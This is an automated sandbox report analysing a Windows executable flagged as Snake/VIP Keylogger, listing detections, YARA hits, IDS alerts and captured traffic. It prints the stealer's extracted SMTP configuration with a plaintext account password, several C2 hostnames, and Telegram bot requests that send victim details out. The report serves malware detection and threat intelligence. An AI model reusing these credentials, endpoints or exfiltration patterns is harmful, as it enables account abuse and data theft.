Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XFo9jVGyLQ.exe

Overview

General Information

Sample name:XFo9jVGyLQ.exe
renamed because original name is a hash value
Original sample name:44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1.exe
Analysis ID:1632400
MD5:414a4cce996061c8f67088e96b9e5745
SHA1:c6ed06b06aa148537fcc1ec9fcbb5f080519cea5
SHA256:44a234e2ebc159b044afa154f48b85f0a9634751638a7ca1f1a6817c5e3ffee1
Tags:exeSnakeKeyloggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XFo9jVGyLQ.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\XFo9jVGyLQ.exe" MD5: 414A4CCE996061C8F67088E96B9E5745)
    • XFo9jVGyLQ.exe (PID: 7072 cmdline: "C:\Users\user\Desktop\XFo9jVGyLQ.exe" MD5: 414A4CCE996061C8F67088E96B9E5745)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2d871:$a1: get_encryptedPassword
          • 0x2db9a:$a2: get_encryptedUsername
          • 0x2d681:$a3: get_timePasswordChanged
          • 0x2d78a:$a4: get_passwordField
          • 0x2d887:$a5: set_encryptedPassword
          • 0x2ef5a:$a7: get_logins
          • 0x2eebd:$a10: KeyLoggerEventArgs
          • 0x2eb22:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 13 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.XFo9jVGyLQ.exe.4d36288.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0.2.XFo9jVGyLQ.exe.4d36288.2.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              0.2.XFo9jVGyLQ.exe.4d36288.2.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                0.2.XFo9jVGyLQ.exe.4d36288.2.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2bc71:$a1: get_encryptedPassword
                • 0x2bf9a:$a2: get_encryptedUsername
                • 0x2ba81:$a3: get_timePasswordChanged
                • 0x2bb8a:$a4: get_passwordField
                • 0x2bc87:$a5: set_encryptedPassword
                • 0x2d35a:$a7: get_logins
                • 0x2d2bd:$a10: KeyLoggerEventArgs
                • 0x2cf22:$a11: KeyLoggerEventArgsEventHandler
                0.2.XFo9jVGyLQ.exe.4d36288.2.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x39a78:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x3911b:$a3: \Google\Chrome\User Data\Default\Login Data
                • 0x39378:$a4: \Orbitum\User Data\Default\Login Data
                • 0x39d57:$a5: \Kometa\User Data\Default\Login Data
                Click to see the 23 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:22:20.018057+010028033053Unknown Traffic192.168.2.949685104.21.96.1443TCP
                2025-03-07T23:22:23.366202+010028033053Unknown Traffic192.168.2.949687104.21.96.1443TCP
                2025-03-07T23:22:35.729444+010028033053Unknown Traffic192.168.2.949695104.21.96.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:22:14.902436+010028032742Potentially Bad Traffic192.168.2.949683132.226.247.7380TCP
                2025-03-07T23:22:17.668241+010028032742Potentially Bad Traffic192.168.2.949683132.226.247.7380TCP
                2025-03-07T23:22:20.793056+010028032742Potentially Bad Traffic192.168.2.949686132.226.247.7380TCP
                2025-03-07T23:22:24.152430+010028032742Potentially Bad Traffic192.168.2.949688132.226.247.7380TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T23:22:44.328853+010018100071Potentially Bad Traffic192.168.2.949700149.154.167.220443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: XFo9jVGyLQ.exeAvira: detected
                Found malware configuration
                Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587"}
                Source: 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "reyes@residenciaviladoconde.com", "Password": "596100Aa++++", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}
                Multi AV Scanner detection for submitted file
                Source: XFo9jVGyLQ.exeVirustotal: Detection: 75%Perma Link
                Source: XFo9jVGyLQ.exeReversingLabs: Detection: 73%
                Joe Sandbox ML detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Sample uses string decryption to hide its real strings
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpackString decryptor: reyes@residenciaviladoconde.com
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpackString decryptor: 596100Aa++++
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpackString decryptor: smtp.ionos.es
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpackString decryptor: anyaegbu.kay@gmail.com
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpackString decryptor: 587
                Source: 0.2.XFo9jVGyLQ.exe.4d36288.2.unpackString decryptor:

                Location Tracking

                barindex
                Tries to detect the country of the analysis system (by using the IP)
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: XFo9jVGyLQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49684 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49700 version: TLS 1.2
                Source: XFo9jVGyLQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: APWe.pdb source: XFo9jVGyLQ.exe
                Source: Binary string: APWe.pdbSHA2564 source: XFo9jVGyLQ.exe
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 010CF45Dh1_2_010CF2C0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 010CF45Dh1_2_010CF4AC
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 010CFC19h1_2_010CF961
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 06733308h1_2_06732EF0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 06732D41h1_2_06732A90
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_06730673
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673D919h1_2_0673D670
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 06733308h1_2_06732EEB
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673E1C9h1_2_0673DF20
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673EA79h1_2_0673E7D0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673EED1h1_2_0673EC28
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673F781h1_2_0673F4D8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673D069h1_2_0673CDC0
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 06733308h1_2_06733236
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673D4C1h1_2_0673D218
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673DD71h1_2_0673DAC8
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673E621h1_2_0673E378
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 06730D0Dh1_2_06730B30
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 067316F8h1_2_06730B30
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_06730853
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h1_2_06730040
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673F329h1_2_0673F080
                Source: C:\Users\user\Desktop\XFo9jVGyLQ.exeCode function: 4x nop then jmp 0673FBD9h1_2_0673F930

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.9:49700 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:29:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
                Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49686 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49688 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49683 -> 132.226.247.73:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49685 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49687 -> 104.21.96.1:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49695 -> 104.21.96.1:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.9:49684 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:29:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20887849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:22:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: XFo9jVGyLQ.exeString found in binary or memory: http://tempuri.org/DataSet1.xsd
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AA1000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:887849%0D%0ADate%20a
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en4
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002C2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBNr
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003DB6000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3338841922.0000000003B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: XFo9jVGyLQ.exe, 00000000.00000002.877240881.00000000049F2000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002AEE000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3335097709.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B18000.00000004.00000800.00020000.00000000.sdmp, XFo9jVGyLQ.exe, 00000001.00000002.3336827072.0000000002B5E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
